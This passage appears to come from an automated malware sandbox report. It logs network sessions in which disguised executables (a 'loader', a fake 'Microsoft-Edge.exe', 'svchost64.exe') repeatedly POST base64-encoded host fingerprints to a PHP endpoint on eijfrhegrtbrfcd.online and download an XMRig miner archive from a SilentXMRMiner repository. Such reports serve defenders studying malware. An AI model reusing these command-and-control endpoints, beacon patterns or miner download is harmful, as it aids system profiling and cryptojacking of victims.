                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                45192.168.2.449816172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:39 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:40 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:40 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJUQvwUHQTcHbqvOMv9u7RU5YeNimW6Pdi3pKtNuOPUWdUYMy88FeXh5wb80scjCe8pJVuaKwaJ4Xjq2S2AL9IJpNKtJXtYZxdCGtZ2BU1gdvkvmIhklg7qbezibyv%2Bad%2BUd1q7NTrck"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9adbfebc431b-EWR
                                                                                                                                                                2024-09-27 15:42:40 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                46192.168.2.449818172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:41 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:41 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:41 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FvNDiZ1vd2eCtBAYFIvQDBI86f2HwM6tqWmueRT3X95Bh5jtxhpWKAN%2BtBK6wUTh8nB6E3PTxdJ9VdqJqqF3kQZSMZjOMZpfp3LNDXSP5a%2B05sERRzpAf2%2FERc8tALvW%2FBFCfhkhYd5%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9ae53f6b438a-EWR
                                                                                                                                                                2024-09-27 15:42:41 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                47192.168.2.449820172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:42 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:42 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:42 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rwmGLfL5H4CZisiQDfsQyYy7jFu3lcxvh%2FAlBzI0hWg5zKF%2B%2BFmTgI2X33rchV66f%2FjMVqougX3S6O5iAshQ3cTOevXDVp7tJEHtZ6dkVJpUlYnh0HlxwEhAHWJV%2FuXW%2BLOpNwPxIEgF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9ae9bfb34367-EWR
                                                                                                                                                                2024-09-27 15:42:42 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                48192.168.2.449822172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:43 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:43 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:43 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OpMtHz3BzpIA94tN0nHuXOmeC1o%2FxTB97tGhNCOdxN8h6MijAg22btv1nMFQwvak98fNq8oefHO%2Bch1upXWLnKAM05QReNqwvytTaJRt0ywkS1zwiHp1AmmhmxHqc%2B6oYChFxlZSzsdu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9af229827ca5-EWR
                                                                                                                                                                2024-09-27 15:42:43 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                49192.168.2.449825172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:45 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:45 UTC660INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:45 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gPnFKHb0kc3kcQ%2BSIzX87i9Q1%2FWEC4HfkmpWDGG5e%2Bd7FmatZvJWh%2Fj0TmFCOZSJ8Oq9%2BC0bCRdMkoUFG8bCj88Fkmzmj3Ay75OlDskcbRA56p33cnZ7Q0DDAR%2FBFErkzTt2mm%2FNwNk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9afe3cdb8c41-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-09-27 15:42:45 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                50192.168.2.449828172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:47 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:47 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:47 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aU9kUXq9182bZVbSoHY3R3dEKmJpdOjk5EtePBH2NJJwbl51voM2nvlP2AdBTtnY2TsI0j2sA9BV%2FioLeMsYGqXEbN%2FyPNEtg%2BJrtE6nu%2F3JSMnowtsYr5SqoG6S0aWHccXrJoZggdzq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b0a78c7c42c-EWR
                                                                                                                                                                2024-09-27 15:42:47 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                51192.168.2.449830140.82.121.34436772C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:49 UTC132OUTGET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1
                                                                                                                                                                Host: github.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-09-27 15:42:50 UTC583INHTTP/1.1 302 Found
                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:49 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                Access-Control-Allow-Origin:
                                                                                                                                                                Location: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                2024-09-27 15:42:50 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                52192.168.2.449832172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:49 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:50 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:50 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOVZr3K5g%2FTW0CHDMIJ%2BRlIsuOUHWukmop%2F1K5bhh8%2BEriNNb1p30yj2vNQlm2z3TrPPmNZ8uHKehxVIhBUeOFB3QpsyZYOFwtCYlW8vGCyY5C2Nj4%2BSJvXb72wdS3jgPFXEf3pr8eQ8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b1abae3438e-EWR
                                                                                                                                                                2024-09-27 15:42:50 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                53192.168.2.449833172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:50 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:50 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:50 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJushxEXoyRiaOT%2ByPdn7kjyDh78jFXOlqXnrjJr2OLhJ1bud2jpoqI%2FxcX1djP98ikIyPH%2BWMkWC%2BGnFFDPqNAw0jXt1%2BanSGyDc5R0q5mPUn7L5UnGKYZFN3yW4jX%2BXFDPGwAGuM2D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b1b9f4a558a-EWR
                                                                                                                                                                2024-09-27 15:42:50 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                54192.168.2.449836172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:52 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:52 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:52 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5t%2FQLr1ifnyHoKvcfpNF7m8GeuNWrIH%2By9bsGR9FOQquzeRHEqCa%2BXbUZ1XMALg0vu36hzHQdjTOybDePOcqC2p7Rbi6JpJka2%2FW30eKYbyInLgOqhNof5SqfIlaAjtsmFhHVI%2B%2FgCba"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b280f4a5e80-EWR
                                                                                                                                                                2024-09-27 15:42:52 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                55192.168.2.449838172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:53 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
